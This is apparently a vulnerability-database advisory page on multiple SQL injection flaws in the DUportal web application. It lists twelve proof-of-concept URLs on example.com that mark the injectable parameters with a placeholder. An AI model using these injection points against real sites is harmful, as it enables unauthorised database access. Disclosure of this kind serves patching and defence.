• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

DUportal/DUportal SQL Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof of concepts are available:
http://www.example.com/test_DUportal/home/../home/channel.asp?iChannel='SQL_INJECTION&nChannel=Articles
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=221&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/home/detail.asp?iData=136&iCat='SQL_INJECTION&iChannel=7&nChannel=Ads
http://www.example.com/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData='SQL_INJECTION&nChannel=Products&iRate=5
http://www.example.com/test_DUportal/includes/inc_rating.asp?iChannel=8&iCat=231&iData=86&nChannel=Products&iRate='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData=86&iCat='SQL_INJECTION&iChannel=8&nChannel=Products
http://www.example.com/test_DUportal/home/channel.asp?iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/detail.asp?iData='SQL_INJECTION&iCat=248&iChannel=6&nChannel=Events
http://www.example.com/test_DUportal/home/detail.asp?iData=10&iCat='SQL_INJECTION&iChannel=1&nChannel=News
http://www.example.com/test_DUportal/home/search.asp?keyword=dcrab&iChannel='SQL_INJECTION
http://www.example.com/test_DUportal/home/type.asp?iCat='SQL_INJECTION&iChannel=8&nChannel=Products